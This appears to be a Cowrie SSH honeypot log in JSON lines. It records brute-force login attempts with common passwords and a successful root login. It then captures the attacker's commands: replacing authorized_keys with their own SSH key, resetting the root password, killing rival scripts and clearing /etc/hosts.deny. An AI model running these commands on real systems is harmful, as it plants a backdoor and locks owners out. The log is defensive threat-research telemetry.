{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-28T13:25:43.500582Z","src_ip":"212.227.125.160","session":"731b54b03dcd"}
{"eventid":"cowrie.login.failed","username":"user","password":"southern","message":"login attempt [user/southern] failed","sensor":"my-vps","timestamp":"2025-08-28T13:25:44.034749Z","src_ip":"212.227.125.160","session":"731b54b03dcd"}
{"eventid":"cowrie.login.failed","username":"user","password":"rusty1","message":"login attempt [user/rusty1] failed","sensor":"my-vps","timestamp":"2025-08-28T13:25:45.190909Z","src_ip":"212.227.125.160","session":"731b54b03dcd"}
{"eventid":"cowrie.login.failed","username":"user","password":"punkin","message":"login attempt [user/punkin] failed","sensor":"my-vps","timestamp":"2025-08-28T13:25:46.304001Z","src_ip":"212.227.125.160","session":"731b54b03dcd"}
{"eventid":"cowrie.login.failed","username":"user","password":"napass","message":"login attempt [user/napass] failed","sensor":"my-vps","timestamp":"2025-08-28T13:25:47.418988Z","src_ip":"212.227.125.160","session":"731b54b03dcd"}
{"eventid":"cowrie.login.failed","username":"user","password":"marian","message":"login attempt [user/marian] failed","sensor":"my-vps","timestamp":"2025-08-28T13:25:48.534741Z","src_ip":"212.227.125.160","session":"731b54b03dcd"}
{"eventid":"cowrie.session.closed","duration":"6.3","message":"Connection lost after 6.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:25:49.649692Z","src_ip":"212.227.125.160","session":"731b54b03dcd"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":52424,"dst_ip":"1.2.3.4","dst_port":22,"session":"ee60f7903f79","protocol":"ssh","message":"New connection: 217.72.205.35:52424 (1.2.3.4:22) [session: ee60f7903f79]","sensor":"my-vps","timestamp":"2025-08-28T13:25:50.042635Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:25:50.043922Z","src_ip":"217.72.205.35","session":"ee60f7903f79"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":52816,"dst_ip":"1.2.3.4","dst_port":22,"session":"55687bbaddd8","protocol":"ssh","message":"New connection: 212.227.125.160:52816 (1.2.3.4:22) [session: 55687bbaddd8]","sensor":"my-vps","timestamp":"2025-08-28T13:26:00.006217Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T13:26:00.007157Z","src_ip":"212.227.125.160","session":"55687bbaddd8"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-28T13:26:00.067444Z","src_ip":"212.227.125.160","session":"55687bbaddd8"}
{"eventid":"cowrie.login.failed","username":"shredstream","password":"shredstream","message":"login attempt [shredstream/shredstream] failed","sensor":"my-vps","timestamp":"2025-08-28T13:26:00.249469Z","src_ip":"212.227.125.160","session":"55687bbaddd8"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:26:01.311685Z","src_ip":"212.227.125.160","session":"55687bbaddd8"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":50270,"dst_ip":"1.2.3.4","dst_port":22,"session":"eb2b29a26625","protocol":"ssh","message":"New connection: 212.227.125.160:50270 (1.2.3.4:22) [session: eb2b29a26625]","sensor":"my-vps","timestamp":"2025-08-28T13:26:09.072363Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T13:26:09.167020Z","src_ip":"212.227.125.160","session":"eb2b29a26625"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T13:26:09.310331Z","src_ip":"212.227.125.160","session":"eb2b29a26625"}
{"eventid":"cowrie.login.failed","username":"mongodb","password":"123123","message":"login attempt [mongodb/123123] failed","sensor":"my-vps","timestamp":"2025-08-28T13:26:09.950757Z","src_ip":"212.227.125.160","session":"eb2b29a26625"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:26:11.136940Z","src_ip":"212.227.125.160","session":"eb2b29a26625"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":37236,"dst_ip":"1.2.3.4","dst_port":22,"session":"930c9863441e","protocol":"ssh","message":"New connection: 212.227.125.160:37236 (1.2.3.4:22) [session: 930c9863441e]","sensor":"my-vps","timestamp":"2025-08-28T13:26:44.961658Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T13:26:45.035455Z","src_ip":"212.227.125.160","session":"930c9863441e"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T13:26:45.341627Z","src_ip":"212.227.125.160","session":"930c9863441e"}
{"eventid":"cowrie.login.failed","username":"mongodb","password":"111111","message":"login attempt [mongodb/111111] failed","sensor":"my-vps","timestamp":"2025-08-28T13:26:45.849246Z","src_ip":"212.227.125.160","session":"930c9863441e"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:26:47.015837Z","src_ip":"212.227.125.160","session":"930c9863441e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":34130,"dst_ip":"1.2.3.4","dst_port":22,"session":"e9951025ec26","protocol":"ssh","message":"New connection: 212.227.125.160:34130 (1.2.3.4:22) [session: e9951025ec26]","sensor":"my-vps","timestamp":"2025-08-28T13:27:19.205149Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T13:27:19.206121Z","src_ip":"212.227.125.160","session":"e9951025ec26"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T13:27:19.373374Z","src_ip":"212.227.125.160","session":"e9951025ec26"}
{"eventid":"cowrie.login.failed","username":"mongodb","password":"1234567","message":"login attempt [mongodb/1234567] failed","sensor":"my-vps","timestamp":"2025-08-28T13:27:19.878120Z","src_ip":"212.227.125.160","session":"e9951025ec26"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:27:21.047199Z","src_ip":"212.227.125.160","session":"e9951025ec26"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":55940,"dst_ip":"1.2.3.4","dst_port":22,"session":"f09ee8073268","protocol":"ssh","message":"New connection: 212.227.235.229:55940 (1.2.3.4:22) [session: f09ee8073268]","sensor":"my-vps","timestamp":"2025-08-28T13:27:37.386456Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T13:27:37.387396Z","src_ip":"212.227.235.229","session":"f09ee8073268"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T13:27:37.596715Z","src_ip":"212.227.235.229","session":"f09ee8073268"}
{"eventid":"cowrie.login.success","username":"root","password":"1qazxsw23edc","message":"login attempt [root/1qazxsw23edc] succeeded","sensor":"my-vps","timestamp":"2025-08-28T13:27:38.471845Z","src_ip":"212.227.235.229","session":"f09ee8073268"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T13:27:38.904376Z","src_ip":"212.227.235.229","session":"f09ee8073268"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T13:27:38.905224Z","src_ip":"212.227.235.229","session":"f09ee8073268"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T13:27:38.906038Z","src_ip":"212.227.235.229","session":"f09ee8073268"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:27:39.115345Z","src_ip":"212.227.235.229","session":"f09ee8073268"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T13:27:39.591923Z","src_ip":"212.227.235.229","session":"f09ee8073268"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-28T13:27:39.592624Z","src_ip":"212.227.235.229","session":"f09ee8073268"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-28T13:27:39.802892Z","src_ip":"212.227.235.229","session":"f09ee8073268"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:27:39.803765Z","src_ip":"212.227.235.229","session":"f09ee8073268"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T13:27:52.431182Z","src_ip":"212.227.235.229","session":"f09ee8073268"}
{"eventid":"cowrie.command.input","input":"cat /proc/cpuinfo | grep name | wc -l","message":"CMD: cat /proc/cpuinfo | grep name | wc -l","sensor":"my-vps","timestamp":"2025-08-28T13:27:52.432077Z","src_ip":"212.227.235.229","session":"f09ee8073268"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/3f1f9a5db692d999bb3d576b5e9956a242136e961ff3f52ba6202b1254ccdb99","size":2,"shasum":"3f1f9a5db692d999bb3d576b5e9956a242136e961ff3f52ba6202b1254ccdb99","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/3f1f9a5db692d999bb3d576b5e9956a242136e961ff3f52ba6202b1254ccdb99 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:27:52.642922Z","src_ip":"212.227.235.229","session":"f09ee8073268"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T13:27:53.085807Z","src_ip":"212.227.235.229","session":"f09ee8073268"}
{"eventid":"cowrie.command.input","input":"echo \"root:0JfITIaLHo9J\"|chpasswd|bash","message":"CMD: echo \"root:0JfITIaLHo9J\"|chpasswd|bash","sensor":"my-vps","timestamp":"2025-08-28T13:27:53.086848Z","src_ip":"212.227.235.229","session":"f09ee8073268"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":48590,"dst_ip":"1.2.3.4","dst_port":22,"session":"91e42bc34d90","protocol":"ssh","message":"New connection: 212.227.125.160:48590 (1.2.3.4:22) [session: 91e42bc34d90]","sensor":"my-vps","timestamp":"2025-08-28T13:27:53.218534Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T13:27:53.220424Z","src_ip":"212.227.125.160","session":"91e42bc34d90"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/fbc98d76907fc0b4d513b8a87199d0b0555e8c98749222ffe623cc32ad05094a","size":21,"shasum":"fbc98d76907fc0b4d513b8a87199d0b0555e8c98749222ffe623cc32ad05094a","duplicate":false,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/fbc98d76907fc0b4d513b8a87199d0b0555e8c98749222ffe623cc32ad05094a after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:27:53.297285Z","src_ip":"212.227.235.229","session":"f09ee8073268"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T13:27:53.567585Z","src_ip":"212.227.125.160","session":"91e42bc34d90"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T13:27:53.735513Z","src_ip":"212.227.235.229","session":"f09ee8073268"}
{"eventid":"cowrie.command.input","input":"rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep;","message":"CMD: rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep;","sensor":"my-vps","timestamp":"2025-08-28T13:27:53.736229Z","src_ip":"212.227.235.229","session":"f09ee8073268"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b","shasum":"01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b","destfile":"/etc/hosts.deny","message":"Saved redir contents with SHA-256 01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b to var/lib/cowrie/downloads/01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b","sensor":"my-vps","timestamp":"2025-08-28T13:27:53.948863Z","src_ip":"212.227.235.229","session":"f09ee8073268"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/a7aa36c3bdff392eb5f787dfa19a7cc8c6cd0b3e77316d5b63b2dc8def608f3a","size":0,"shasum":"a7aa36c3bdff392eb5f787dfa19a7cc8c6cd0b3e77316d5b63b2dc8def608f3a","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/a7aa36c3bdff392eb5f787dfa19a7cc8c6cd0b3e77316d5b63b2dc8def608f3a after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:27:53.949810Z","src_ip":"212.227.235.229","session":"f09ee8073268"}
{"eventid":"cowrie.login.failed","username":"apache","password":"123456","message":"login attempt [apache/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T13:27:54.139695Z","src_ip":"212.227.125.160","session":"91e42bc34d90"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T13:27:54.426318Z","src_ip":"212.227.235.229","session":"f09ee8073268"}
